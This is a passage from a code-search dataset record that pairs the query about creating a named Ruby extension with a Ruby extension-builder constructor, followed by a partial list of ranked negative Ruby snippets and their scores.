query
stringlengths 7
9.55k
| document
stringlengths 10
363k
| metadata
dict | negatives
listlengths 0
101
| negative_scores
listlengths 0
101
| document_score
stringlengths 3
10
| document_rank
stringclasses 102
values |
|---|---|---|---|---|---|---|
Maps provider with a lightweight resource.
|
def map_resource(file)
file_handle = File.open(File.expand_path(file), 'r')
file_handle.readlines.each do |line|
if line =~ /#\s@resource/
resource_name = line.split(%r{@resource })[1].strip
@resource = ChefObject.register(RESOURCE, resource_name, :resource)
@resource.providers.push(self) unless @resource.providers.include?(self)
break
end
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def provider; end",
"def map_resource(*args, &block)\n map_enclosing_resource(*args, &block)\n end",
"def test_initialize_finds_records\n prov = mkprovider\n prov.default_target = :yayness\n\n prov.target_object(:yayness).write \"bill a c\\njill b d\"\n\n prov.prefetch\n\n # Now make a resource\n bill = @type.new :name => \"bill\"\n\n assert_equal(\"a\", bill.provider.one, \"Record was not found in memory\")\n end",
"def _provider( name, options )\n\n\t\t\t@_provider ||= { }\n\t\t\t@_provider[ name ] ||= (\n\n\t\t\t\tObject::const_get( name ).new( options )\n\t\t\t)\n\t\tend",
"def use_provider( name )\n name = name.to_s\n raise Polylog::UnknownProvider, \"unknown provider: #{name.inspect}\" unless @providers.key? name\n\n @provider = @providers[name]\n end",
"def resource(uri, opts = {})\n #resource = Resource.new(self, uri, opts)\n @resources ||= {}\n @resources[uri] ||= Resource.new(self, uri, opts)\n end",
"def create_simple_provider_source\n create_source(PROVIDER_TEMPLATE, provider_path)\n end",
"def new_from_resource(rsrc); self.class.new_from_resource(rsrc) end",
"def provider=(_arg0); end",
"def provide(oid = :all, &block)\n provider = Provider.new(oid)\n provider.instance_eval(&block)\n\n # Providers are pushed onto the end of the provider queue.\n # When dispatching, this is searched in order for a match.\n # So, like exception handlers, you such specify providers\n # in order of most -> least specific oid. ('1.3.1' comes before '1.3')\n providers << provider\n end",
"def my_provider\n self.class.my_provider\n end",
"def use_provider( provider_class, opts = {} )\n opts = opts.merge( sync_file_path: caller_path( caller ) )\n @provider = provider_class.new( self, opts )\n end",
"def new\n self.default_provider.new\n end",
"def resource\n @resource ||= resource_set.createResource(uri)\n end",
"def create\n might_update_resource do\n provider.create\n end\n end",
"def create\n might_update_resource do\n provider.create\n end\n end",
"def create\n might_update_resource do\n provider.create\n end\n end",
"def create\n might_update_resource do\n provider.create\n end\n end",
"def resource(name, type=nil, &block)\n resource = GenericResource.new\n resource.type = type\n resource.evaluate &block\n add_resource name, resource\n end",
"def new\n @provider = Provider.new\n end",
"def method_missing(name, *args, &block)\n if self.provider && provider.respond_to?(name)\n self.provider.send(name, *args, &block)\n else\n super(name, *args, &block)\n end\n end",
"def provider\n\tend",
"def initialize(provider)\n @provider = provider\n end",
"def initialize\n set_default_as_provider\n yield self if block_given?\n end",
"def create_resource_for(resource_name)\n resource = self.class.const_set(resource_name, Class.new(Meli::Base))\n resource.prefix = self.class.prefix\n resource.site = self.class.site\n resource\n end",
"def provider\n use_provider('null') unless defined? @provider\n @provider\n end",
"def set_provider\n @provider = Provider.friendly.find(params[:id])\n end",
"def provide(name, content = T.unsafe(nil), &block); end",
"def resource\n @resource ||= resource_klass.new object\n end",
"def method_missing(name, *args, &blk)\n provider.send(name, *args)\n end",
"def register_provider(name, klass)\n @providers[name] = klass\n end",
"def provider\n get(PROVIDER)\n end",
"def maybe_explicit_provider(resource)\n return nil unless resource.provider\n resource.provider\n end",
"def instantiate\n resource.new(data)\n end",
"def resource(*resources, &block); end",
"def initialize(name, prov={}, attrs={}, sanitize_attributes:false)\n if name.is_a? ResourceLoader\n @provider, @type, @name, @id = name.provider, name.type, name.name, nil\n @path, @namespace = name.path, name.namespace\n else\n @provider, @type, @name, @id = prov[:name], prov[:type], name, prov[:id]\n @path, @namespace = nil, nil\n end\n\n # Duplicate each attribute to ensure they are unique to the instance.\n attributes.each { |key,val| attributes[key] = val.dup }\n\n # Take any named attribute and set its value from the resource name.\n attributes[named_attribute].value = @name unless named_attribute.equal?(NULL)\n\n # Update the attributes with the values from the `attrs` argument.\n attrs.each do |key,val|\n attributes[key].set_value val, sanitize_attributes: sanitize_attributes\n end\n end",
"def prefetch(resources = {})\n\n # generate hash of {provider_name => provider}\n providers = instances.inject({}) do |hash, instance|\n hash[instance.name] = instance\n hash\n end\n\n # For each prefetched resource, try to match it to a provider\n resources.each do |resource_name, resource|\n if provider = providers[resource_name]\n resource.provider = provider\n end\n end\n\n # Generate default providers for resources that don't exist on disk\n resources.values.select {|resource| resource.provider.nil? }.each do |resource|\n resource.provider = new(:name => resource.name, :provider => name, :ensure => :absent)\n end\n end",
"def new(*args)\n obj = super\n @provider_instances << obj\n obj\n end",
"def mappings_provider(provider_name, is_legacy = false)\n return nil if provider_name.nil?\n provider = nil\n module_name = is_legacy ? 'Highlander': 'Cfhighlander'\n begin\n providers = Object.const_get(module_name).const_get('MapProviders')\n providers.const_get(provider_name)\n rescue NameError => e\n if e.to_s.include? \"uninitialized constant\"\n return mappings_provider(provider_name, true) unless is_legacy\n return nil\n end\n STDERR.puts(e.to_s)\n raise e\n end\nend",
"def allocate(template)\n rc = Provider.by_name(@client, template['name'])\n\n return rc if OpenNebula.is_error?(rc)\n\n if rc\n return OpenNebula::Error.new(\"Provider #{template['name']} \" \\\n 'already exists')\n end\n\n rc = nil\n\n begin\n Terraform.p_load\n\n Terraform.check_connection(template)\n\n rc = to_json(template)\n\n return rc if OpenNebula.is_error?(rc)\n rescue StandardError => e\n return OpenNebula::Error.new(e)\n end\n\n template['plain'] ||= {}\n template['plain']['provider'] = template['provider']\n\n super(rc, template['name'], template['plain'])\n end",
"def test_prefetch\n prov = mkprovider\n\n prov.filetype = :ram\n prov.default_target = :default\n\n # Create a couple of demo files\n prov.target_object(:file1).write \"bill b c\\njill b d\"\n\n prov.target_object(:default).write \"will b d\\n\"\n\n # Create some resources for some of those demo files\n bill = mkresource \"bill\", :target => :file1, :one => \"b\", :two => \"c\"\n will = mkresource \"will\", :target => :default, :one => \"b\", :two => \"d\"\n\n resources = {\"bill\" => bill, \"will\" => will}\n prov_ids = {\"bill\" => bill.provider.object_id, \"will\" => will.provider.object_id}\n\n assert_nothing_raised do\n prov.prefetch(resources)\n end\n\n assert(bill.provider.object_id != prov_ids[\"bill\"], \"provider was not replaced in resource\")\n assert(will.provider.object_id != prov_ids[\"will\"], \"provider was not replaced in resource\")\n\n # Make sure we prefetched our resources.\n assert_equal(\"b\", bill.provider.one, \"did not prefetch resource from file1\")\n assert_equal(\"c\", bill.provider.two, \"did not prefetch resource from file1\")\n assert_equal(\"b\", will.provider.one, \"did not prefetch resource from default\")\n assert_equal(\"d\", will.provider.two, \"did not prefetch resource from default\")\n\n # Now modify our resources and write them out, making sure that prefetching\n # hasn't somehow destroyed this ability\n bill[:one] = \"a\"\n will[:one] = \"a\"\n\n assert_apply(bill)\n assert_apply(will)\n\n prov.prefetch(resources)\n assert_equal(\"a\", bill.provider.one, \"did not prefetch resource from file1\")\n assert_equal(\"a\", will.provider.one, \"did not prefetch resource from default\")\n\n assert_equal(\"bill a c\\njill b d\\n\", prov.target_object(:file1).read,\n \"Did not write changed resource correctly\")\n assert_equal(\"will a d\\n\", prov.target_object(:default).read,\n \"Did not write changed default resource correctly\")\n end",
"def create_provider_object(config, logger, metrics, redis_connection_pool, provider_class, provider_name, options)\n provider_klass = Vmpooler::PoolManager::Provider\n provider_klass.constants.each do |classname|\n next unless classname.to_s.casecmp(provider_class) == 0\n\n return provider_klass.const_get(classname).new(config, logger, metrics, redis_connection_pool, provider_name, options)\n end\n raise(\"Provider '#{provider_class}' is unknown for pool with provider name '#{provider_name}'\") if provider_klass.nil?\n end",
"def new(data={})\n self.spira_resource.new(data)\n end",
"def provider\n @provider\n end",
"def load_resource_with_associated_resources\n item = load_resource\n load_storage_system(item)\n\n # item.set_storage_pool(OneviewSDK::StoragePool.new(item.client, name: storage_pool)) if storage_pool\n # Workaround for issue in oneview-sdk:\n if storage_pool\n sp = OneviewSDK::StoragePool.find_by(item.client, name: storage_pool).first\n raise \"Storage Pool '#{sp['name']}' not found\" unless sp\n item['storagePoolUri'] = sp['uri']\n end\n\n item.set_snapshot_pool(OneviewSDK::StoragePool.new(item.client, name: snapshot_pool)) if snapshot_pool\n item.set_storage_volume_template(OneviewSDK::VolumeTemplate.new(item.client, name: volume_template)) if volume_template\n\n # Convert capacity integers to strings\n item['provisionedCapacity'] = item['provisionedCapacity'].to_s if item['provisionedCapacity']\n item['allocatedCapacity'] = item['allocatedCapacity'].to_s if item['allocatedCapacity']\n\n unless item.exists? # Also set provisioningParameters if the volume does not exist\n item['provisioningParameters'] ||= {}\n item['provisioningParameters']['shareable'] = item['shareable'] if item['provisioningParameters']['shareable'].nil?\n item['provisioningParameters']['provisionType'] ||= item['provisionType']\n item['provisioningParameters']['requestedCapacity'] ||= item['provisionedCapacity']\n item['provisioningParameters']['storagePoolUri'] ||= item['storagePoolUri']\n end\n item\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def initialize(resource)\n @resource = resource\n end",
"def initialize(resource)\n if self.class.parsed_NFS == {}\n self.class.prefetch(resource)\n end\n super\n end",
"def providify\n newparam(:provider)\n nil\n end",
"def set_provider\r\n @provider = Provider.find(params[:id])\r\n end",
"def resource_proxy\n resource_proxy_class.new\n end",
"def provider(force_reload=false)\n return @provider unless @provider.nil? || force_reload\n @provider = ServiceProvider.get(@provider_permalink)\n end",
"def load_resource_with_associated_resources\n item = load_resource\n load_storage_system(item)\n\n # item.set_storage_pool(OneviewSDK::StoragePool.new(item.client, name: storage_pool)) if storage_pool\n # Workaround for issue in oneview-sdk:\n if storage_pool\n sp = OneviewSDK::StoragePool.find_by(item.client, name: storage_pool, storageSystemUri: item['storageSystemUri']).first\n raise \"Storage Pool '#{sp['name']}' not found\" unless sp\n item['storagePoolUri'] = sp['uri']\n end\n\n if snapshot_pool\n snapshot_pool_resource = OneviewSDK::StoragePool.find_by(item.client, name: snapshot_pool, storageSystemUri: item['storageSystemUri']).first\n item.set_snapshot_pool(snapshot_pool_resource)\n end\n item.set_storage_volume_template(OneviewSDK::VolumeTemplate.new(item.client, name: volume_template)) if volume_template\n\n # Convert capacity integers to strings\n item['provisionedCapacity'] = item['provisionedCapacity'].to_s if item['provisionedCapacity']\n item['allocatedCapacity'] = item['allocatedCapacity'].to_s if item['allocatedCapacity']\n\n unless item.exists? # Also set provisioningParameters if the volume does not exist\n item['provisioningParameters'] ||= {}\n item['provisioningParameters']['shareable'] = item['shareable'] if item['provisioningParameters']['shareable'].nil?\n item['provisioningParameters']['provisionType'] ||= item['provisionType']\n item['provisioningParameters']['requestedCapacity'] ||= item['provisionedCapacity']\n item['provisioningParameters']['storagePoolUri'] ||= item['storagePoolUri']\n end\n item\n end",
"def resource_map\n return @resource_map unless @resource_map.nil?\n _pos = @_io.pos\n @_io.seek(header.ofs_resource_map)\n @_raw_resource_map = @_io.read_bytes(header.len_resource_map)\n _io__raw_resource_map = Kaitai::Struct::Stream.new(@_raw_resource_map)\n @resource_map = ResourceMap.new(_io__raw_resource_map, self, @_root)\n @_io.seek(_pos)\n @resource_map\n end",
"def build_resource(hash = {})\n self.resource = resource_class.new(hash)\n end",
"def add_mapping(resource, options); end",
"def get_resource\n\t\t\tlogger.debug {\"ALLOCATING NEW RESOURCE --> #{ ActiveOrient.db_pool.size }\" }\n login = [ActiveOrient.default_server[:user] , ActiveOrient.default_server[:password]]\n server_adress = \"http://#{ActiveOrient.default_server[:server]}:#{ActiveOrient.default_server[:port]}\"\n\t\t\t RestClient::Resource.new(server_adress, *login)\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_provider\n @provider = Provider.find(params[:id])\n end",
"def set_resource(resource = nil)\n resource ||= if resource_class.respond_to? :cache_fetch\n resource_class.cache_fetch(id: params[:id]) { resource_class.find(params[:id]) }\n else\n resource_class.find(params[:id])\n end\n instance_variable_set(\"@#{resource_name}\", resource)\n end",
"def for(resource)\n @resource = resource\n self\n end",
"def load_current_resource; end",
"def get_resource(name)\n resource = Resource.new\n resource.name = name\n resource.get_resource\n yield resource.resource if block_given?\n resource\n end",
"def resource_locator(resource)\n ::Decidim::ResourceLocatorPresenter.new(resource)\n end",
"def build_resource\n self.resource = resource_class.new(resource_params)\n end",
"def initialize_provider(provider=nil)\n prv = cleanup_provider(Souffle::Config[:provider])\n Souffle::Provider.const_get(prv).new\n rescue Souffle::Exceptions::InvalidAwsKeys => e\n Souffle::Log.error \"#{e.message}:\\n#{e.backtrace.join(\"\\n\")}\"\n rescue Exception\n raise Souffle::Exceptions::InvalidProvider,\n \"The provider Souffle::Provider::#{prv} does not exist.\"\n end",
"def resolve_provider\n attributes.fetch(:resolveProvider)\n end",
"def provide\n raise NotImplementedError\n end",
"def resource(name, &block)\n # It creates a new class based on the resource name scoped tot he Scrumy module\n klass = Scrumy::Models.const_set(name.to_s.classify, Class.new(Scrumy::Models::Model))\n # Then executes the block on the class. The class provides several class\n # methods for making instances behave correctly.\n klass.class_exec &block\nend",
"def set_resource\n instance_variable_set(\"@#{resource_name}\", load_resource)\n end",
"def resource_set klass, resource_name, data\n\t\t\t\t@monitor.synchronize do\n\t\t\t\t\textension = File.extname(resource_name)\n\t\t\t\t\tif @resource_extensions.include? extension\n\t\t\t\t\t\tload, save = @resource_extensions[extension]\n\t\t\t\t\t\tdata = save.call data, klass, resource_name\n\t\t\t\t\tend\n\t\t\t\t\t\n\t\t\t\t\tfound = false\n\t\t\t\t\tproviders.each do |p|\n\t\t\t\t\t\tnext unless p.class_exist?(klass.name)\n\t\t\t\t\t\tp.resource_set klass.name, resource_name, data\n\t\t\t\t\t\tfound = true\n\t\t\t\t\t\tbreak\n\t\t\t\t\tend\n\t\t\t\t\t\n\t\t\t\t\traise \"Class '#{klass.name}' doesn't exist!\" unless found\n\t\t\t\tend\n\t\t\tend",
"def provide(domain, &block)\n @providers[domain] << block\n end",
"def resource(set_name, path, &block)\n self.class.resource(set_name, path, &block)\n end",
"def show\n @provider = Provider.find(params[:id])\n map_type = GMapType::G_HYBRID_MAP\n coords = @provider.locations.first.fetch_coordinates()\n @map = GMap.new(\"map\")\n @map.control_init(:large_map => true, :map_type => true, :street_view_control => true)\n @map.center_zoom_init(coords,14)\n @map.overlay_init(GMarker.new(coords,:title => \"#{@provider.full_name}\", :info_window => \"Provider Location\"))\n @map.set_map_type_init(map_type)\n\n respond_to do |format|\n format.html # show.html.erb\n format.xml { render :xml => @provider }\n format.json { }\n end\n end",
"def build_resource(hash=nil)\n self.resource = resource_class.new_with_session(hash || {}, session)\n end",
"def initialize(resource)\n if self.class.parsed_auth_db == {}\n self.class.prefetch(resource)\n end\n super\n end",
"def provider=(provider)\n @provider = provider\n end",
"def resource\n @resource ||= begin\n resource_constant.new(attributes)\n end\n end",
"def call_provider(_value); end",
"def initialize(resource)\n @resource = resource\n end",
"def prepare_resource(name,via = :get)\n preparation = Weary::Resource.new(name)\n preparation.via = via\n preparation.headers = @headers unless @headers.blank?\n preparation.url = \"#{@domain}#{preparation.name}.\" + (@format || :json).to_s if @domain\n preparation\n end",
"def provider=(name)\n return unless name\n\n set_provider(name)\n copy_provider_keys\n end",
"def load_provider_model\n @provider_info_model ||= provider_infos.first\n end",
"def setup\n logger = debug? ? Logger.new($stderr) : nil\n Resource.configure(api_key: api_key, logger: logger)\n\n @map = Map::Builder.new.build\n end",
"def load_current_resource\n @current_resource = Chef::Resource::NexusCapability.new(new_resource.name)\n\n run_context.include_recipe \"nexus::cli\"\n Chef::Nexus.ensure_nexus_available(node)\n\n @current_resource\nend",
"def map(&block)\n resources.map(*args, &block)\n end",
"def initialize(resource)\n @resource = resource\n end",
"def initialize(name, provider)\n @name = name\n @provider = provider\n end",
"def new\n build_resource\n yield resource if block_given?\n end",
"def retrieve\n provider.send(self.class.name)\n end",
"def provider\n begin\n @provider ||= eval(\"MusicProviders::#{source}\").new\n rescue\n @provider = MusicProviders::DefaultProvider.new\n end\n end",
"def provider\n SwitchUser::Provider.init(self)\n end",
"def resolve_resource(resource, resources, am_manager, authorizer)\n debug \"resolve_resource: resource: #{resource}, resources: #{resources}\"\n descr = {}\n descr[:domain] = resource[:domain]\n descr[:exclusive] = resource[:exclusive]\n\n av_resources = get_available_components(descr, resource[:type], resource[:valid_from], resource[:valid_until], resources, 1, am_manager, authorizer)\n\n raise OMF::SFA::AM::UnavailableResourceException if av_resources.empty?\n\n res = av_resources.sample\n resource[:uuid] = res.uuid.to_s\n resource[:urn] = res.urn\n resource[:urn]\n end",
"def qualify(api_map, context = T.unsafe(nil)); end",
"def implementer\n provider\n end"
] |
[
"0.619483",
"0.6116507",
"0.61114836",
"0.59024763",
"0.59022415",
"0.58697927",
"0.5845976",
"0.58332676",
"0.57967645",
"0.57821023",
"0.5757989",
"0.57547903",
"0.57504916",
"0.57383555",
"0.5731324",
"0.5731324",
"0.5731324",
"0.5731324",
"0.57086384",
"0.5698226",
"0.56974757",
"0.5680417",
"0.5646967",
"0.56388557",
"0.5629987",
"0.55832475",
"0.5580032",
"0.55715036",
"0.55227673",
"0.5521425",
"0.551156",
"0.55059725",
"0.55027866",
"0.55024415",
"0.5500581",
"0.5497364",
"0.5482986",
"0.54754716",
"0.5460767",
"0.5430539",
"0.5420687",
"0.5400889",
"0.53938353",
"0.5393336",
"0.5378789",
"0.537838",
"0.53781325",
"0.53775656",
"0.5371489",
"0.53677183",
"0.53644675",
"0.53562886",
"0.5353303",
"0.5351961",
"0.5351548",
"0.53292626",
"0.5329149",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5328534",
"0.5312507",
"0.5306837",
"0.52978617",
"0.5293756",
"0.5279998",
"0.5277859",
"0.5272492",
"0.5258953",
"0.52584326",
"0.52510566",
"0.5249211",
"0.52432585",
"0.52432066",
"0.52428883",
"0.5236018",
"0.5215947",
"0.520231",
"0.51856685",
"0.51815736",
"0.5175718",
"0.5173395",
"0.5159612",
"0.51508707",
"0.5145426",
"0.51408225",
"0.51398283",
"0.513767",
"0.5117122",
"0.5116818",
"0.5116668",
"0.51146334",
"0.5103064",
"0.5098871",
"0.5094509",
"0.50898486",
"0.50895524"
] |
0.58592755
|
6
|
Actions implemented in the lightweight provider.
|
def actions
children_by_type(:action)
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def actions; end",
"def run_actions; end",
"def provider; end",
"def action_hook; end",
"def add_actions; end",
"def handlers; end",
"def handlers; end",
"def handlers; end",
"def handler; end",
"def handler; end",
"def methods() end",
"def operations; end",
"def operations; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def action; end",
"def provider\n\tend",
"def act\n end",
"def methods; end",
"def methods; end",
"def methods; end",
"def methods; end",
"def release_actions; end",
"def action_run\n end",
"def action_methods; end",
"def action_methods; end",
"def action_methods; end",
"def handle; end",
"def perform_action(data); end",
"def action_missing(*)\n end",
"def fetch\n end",
"def invoke; end",
"def lookup_action; end",
"def handle\n end",
"def perform_action(*args)\n end",
"def run\n super\n \n # Now that we have our core details, check cloud statusi\n cloud_providers = determine_cloud_status(@entity)\n _log \"Got: #{cloud_providers}\"\n\n _set_entity_detail \"cloud_providers\", cloud_providers.uniq.sort\n _set_entity_detail \"cloud_hosted\", !cloud_providers.empty?\n \n end",
"def actions() ; info[:actions] ; end",
"def actions() ; info[:actions] ; end",
"def perform\n \n end",
"def callbacks; end",
"def callbacks; end",
"def perform; end",
"def perform; end",
"def _handle_action_missing(*args); end",
"def define_action_hook; end",
"def internal; end",
"def action args = {}\n\t\tend",
"def invoke\r\n # TODO: rename to more appropriate one 2007/05/10 by shino\r\n raise 'must be implemented in subclasses'\r\n end",
"def mco_action\n raise RuntimeError, \"Not implemented\"\n end",
"def api; end",
"def api; end",
"def call\n\n\tend",
"def call\n\n\tend",
"def call\n # implement in subclasses\n end",
"def perform_raw; end",
"def action\n end",
"def operation; end",
"def handler_method; end",
"def fetch\n raise NotImplementedError\n end",
"def perform(*args)\n\tend",
"def implementation; end",
"def implementation; end",
"def resource; end",
"def method_missing(action, *args, &block)\n return nil\n end",
"def retrieve\n end",
"def dispatch\n raise NotImplementedError\n end",
"def action\n end",
"def actions\n client.actions\n end",
"def call\n raise NotImplementedError,\n \"Override #call and implement your application logic.\"\n end",
"def invoke\n raise NotImplementedError, \"Author of subclass forgot to implement #invoke\"\n end",
"def executor; end",
"def executor; end",
"def executor; end",
"def fetch; end",
"def fetch; end",
"def click_action\n raise NotImplementedError \"Subclasses must implement this method\"\n end",
"def fetch(*)\n raise NotImplementedError, 'This should be defined in a subclass'\n end",
"def provider=(_arg0); end",
"def manage\n\n end",
"def action(unit)\n\tend",
"def action_locator_args()\n \n end",
"def perform\n raise NotImplementedError\n end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def request; end",
"def action\n super\n end",
"def private; end",
"def perform\n raise NotImplementedError\n end",
"def context_methods; end",
"def context; end",
"def context; end"
] |
[
"0.6830602",
"0.68000126",
"0.6506426",
"0.64876336",
"0.6398637",
"0.6345477",
"0.6345477",
"0.6345477",
"0.6256118",
"0.6256118",
"0.6222472",
"0.62031734",
"0.62031734",
"0.6193786",
"0.6193786",
"0.6193786",
"0.6193786",
"0.6193786",
"0.61442804",
"0.6126431",
"0.61225235",
"0.61225235",
"0.61225235",
"0.61225235",
"0.61106247",
"0.60729694",
"0.60353017",
"0.60353017",
"0.60353017",
"0.60280704",
"0.60276306",
"0.60186595",
"0.59816086",
"0.5975354",
"0.59674853",
"0.5949203",
"0.59196436",
"0.58850324",
"0.5874148",
"0.5874148",
"0.5873388",
"0.5832085",
"0.5832085",
"0.5818901",
"0.5818901",
"0.5815811",
"0.5775052",
"0.57703316",
"0.57700723",
"0.57660043",
"0.57655305",
"0.5763485",
"0.5763485",
"0.5762643",
"0.5762643",
"0.57531214",
"0.5751514",
"0.5744972",
"0.57427275",
"0.5740921",
"0.5735705",
"0.57240665",
"0.5704006",
"0.5704006",
"0.5703491",
"0.56954205",
"0.56730765",
"0.56721175",
"0.56657827",
"0.5658469",
"0.56565946",
"0.5656038",
"0.56510574",
"0.56510574",
"0.56510574",
"0.56498915",
"0.56498915",
"0.5648413",
"0.5648214",
"0.56448126",
"0.5638952",
"0.5633598",
"0.5629678",
"0.5615486",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.561356",
"0.56086046",
"0.5607712",
"0.5605893",
"0.559737",
"0.5595944",
"0.5595944"
] |
0.0
|
-1
|
Create a new Ruby extension with a given name. This name will be the actual name of the extension, e.g. you'll have name.so and you will call require 'name' when using your new extension. This constructor can be standalone or take a block.
|
def initialize(name, &block)
@name = name
@modules = []
@writer_mode = :multiple
@requesting_console = false
@force_rebuild = false
@options = {
:include_paths => [],
:library_paths => [],
:libraries => [],
:cxxflags => [],
:ldflags => [],
:include_source_files => [],
:includes => []
}
@node = nil
parse_command_line
if requesting_console?
block.call(self) if block
start_console
elsif block
build_working_dir(&block)
block.call(self)
build
write
compile
end
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_module(name, &block)\n mod = Module.new(&block)\n @managed.const_set(name, mod)\n mod\n end",
"def initialize(name)\n @path, @name = nil\n\n if File.directory?(name)\n @path, @name = name, File.basename(name)\n\n elsif Main.respond_to?(:extensions_path)\n @name = name\n [Main.extensions_path].flatten.each do |dir|\n next unless @path.nil?\n @path = File.join(dir, name)\n @path = nil unless File.directory?(@path)\n end\n end\n\n raise ExtensionNotFound unless File.directory?(@path.to_s)\n end",
"def create(name)\n\t\t\n\t\t# if (mod_ambiguous[name])\n\t\t#\traise Rex::AmbiguousArgumentError.new(name), \n\t\t#\t\t\"The module name #{name} is ambiguous.\", caller\n\t\t# end\n\n\t\tklass = get_hash_val(name)\n\t\tinstance = nil\n\n\t\t# If there is no module associated with this class, then try to demand\n\t\t# load it.\n\t\tif (klass.nil? or klass == SymbolicModule)\n\t\t\t# If we are the root module set, then we need to try each module\n\t\t\t# type's demand loading until we find one that works for us.\n\t\t\tif (module_type.nil?)\n\t\t\t\tMODULE_TYPES.each { |type|\n\t\t\t\t\tframework.modules.demand_load_module(type + '/' + name)\n\t\t\t\t}\n\t\t\telse\n\t\t\t\tframework.modules.demand_load_module(module_type + '/' + name)\n\t\t\tend\n\n\t\t\tklass = get_hash_val(name)\n\t\tend\n\n\t\t# If the klass is valid for this name, try to create it\n\t\tif (klass and klass != SymbolicModule)\n\t\t\tinstance = klass.new\n\t\tend\n\n\t\t# Notify any general subscribers of the creation event\n\t\tif (instance)\n\t\t\tself.framework.events.on_module_created(instance)\n\t\tend\n\n\t\treturn instance\n\tend",
"def new(namespace, name, *args, &block); end",
"def initialize(java_name, rubymod = nil)\n pkg = java_name.split(JAVA_PKG_SEP)\n pkg = rubymod ? [rubymod, ns2mod(pkg[-1])] : pkg.map { |part| ns2mod(part) }\n\n parts = pkg.pop.split(JAVA_CLASS_SEP)\n @basename = parts.pop\n @outter_class = parts.join(RUBY_PKG_SEP)\n @module = rubymod || pkg.join(RUBY_PKG_SEP)\n @name = [@module, @outter_class, @basename].reject(&:empty?).join(RUBY_PKG_SEP)\n\n super @name\n end",
"def initialize(name,&ruby_block)\n # Checks and sets the name.\n @name = name.to_sym\n # Sets the block for instantiating a task.\n @ruby_block = ruby_block\n # Sets the instantiation procedure if named.\n return if @name.empty?\n obj = self\n HDLRuby::High.space_reg(@name) do |*args|\n obj.instantiate(*args)\n end\n end",
"def initialize(name=nil, version=nil)\n init(name, version)\n yield self if block_given?\n define unless name.nil?\n end",
"def initialize(name=nil, version=nil)\n init(name, version)\n yield self if block_given?\n define unless name.nil?\n end",
"def initialize(name=nil, version=nil)\n init(name, version)\n yield self if block_given?\n define unless name.nil?\n end",
"def initialize(name)\n @r = name\n list = FILE_LIST\n\n list = list << {:name=>\"lib/#{name}\", :file=>false}\n list = list << {:name=>\"spec/#{name}_spec.rb\", :file=>true}\n\n super(name, list)\n\n\n end",
"def initialize(name)\n @name = name\n freeze\n end",
"def initialize(name) end",
"def initialize(name, depth = nil, overflow = nil, &ruby_block)\n @name = name.to_sym\n @body = ruby_block\n @depth = depth ? depth.to_i : nil\n @overflow = overflow ? overflow.to_proc : nil\n end",
"def initialize(source)\n source = source.sub('.rb', '')\n require source\n @module_name = pascalize(File.basename(source))\n extend self.class.module_eval(@module_name)\n end",
"def initialize(name, *args)\n @name = name\n @options = args.extract_options!\n @iv_name = (args.first || @name).to_s.gsub('.', '_')\n @registry = []\n end",
"def create(name)\n klass = fetch(name, nil)\n instance = nil\n\n # If there is no module associated with this class, then try to demand\n # load it.\n if klass.nil? or klass == Msf::SymbolicModule\n # If we are the root module set, then we need to try each module\n # type's demand loading until we find one that works for us.\n if module_type.nil?\n Msf::MODULE_TYPES.each { |type|\n framework.modules.load_cached_module(type, name)\n }\n else\n framework.modules.load_cached_module(module_type, name)\n end\n\n recalculate\n\n klass = fetch(name, nil)\n end\n\n # If the klass is valid for this name, try to create it\n unless klass.nil? or klass == Msf::SymbolicModule\n instance = klass.new\n end\n\n # Notify any general subscribers of the creation event\n if instance\n self.framework.events.on_module_created(instance)\n end\n\n return instance\n end",
"def initialize(name)\n @block = ->(*args) { new(*args).public_send(name) }\n end",
"def initialize(name)\n @block = ->(*args) { new(*args).public_send(name) }\n end",
"def initialize(name, interpreter)\n @name = name\n @interpreter = interpreter\n end",
"def module(name, &block)\n m = RbModule.new(name, @parser, &block)\n @modules << m\n m\n end",
"def initialize(name, ruby_type = nil)\n @name = name\n @ruby_type = ruby_type || \"_unknown\"\n end",
"def initialize(name)\n init(name)\n yield self if block_given?\n define unless name.nil?\n puts \"Windows users require sed and perl for rake:compile - please install onto PATH\" if /mswin|mingw/ =~ RUBY_PLATFORM\n end",
"def initialize(name)\n @name = name\n @options = {}\n\n yield self if block_given?\n\n define\n end",
"def util_dummy_extension(spec, name = \"a\")\n extconf = File.join(\"ext\", name, \"extconf.rb\")\n dummy_c = File.join(\"ext\", name, \"dummy.c\")\n\n spec.extensions << extconf\n spec.files << dummy_c\n\n dir = spec.gem_dir\n FileUtils.mkdir_p dir\n\n Dir.chdir dir do\n FileUtils.mkdir_p File.dirname(extconf)\n\n # extconf.rb\n File.open extconf, \"w\" do |f|\n f.write <<~EOF\n require \"mkmf\"\n\n create_makefile(\"#{name}\")\n EOF\n end\n\n # dummy.c\n File.open dummy_c, \"w\" do |f|\n f.write <<~EOF\n #include <ruby.h>\n\n void Init_#{name}(void)\n {\n rb_p(ID2SYM(rb_intern(\"ok\")));\n }\n EOF\n end\n end\n end",
"def initialize(name)\n name(name)\n end",
"def create_by_name(name)\n self.new.tap do |o|\n o.name = name # ambos sirven\n end\n end",
"def initialize(name)\n @name = name\n @files = []\n @quiet = false\n\n # Allow custom configuration to be defined in a block passed to constructor\n yield self if block_given?\n\n define\n end",
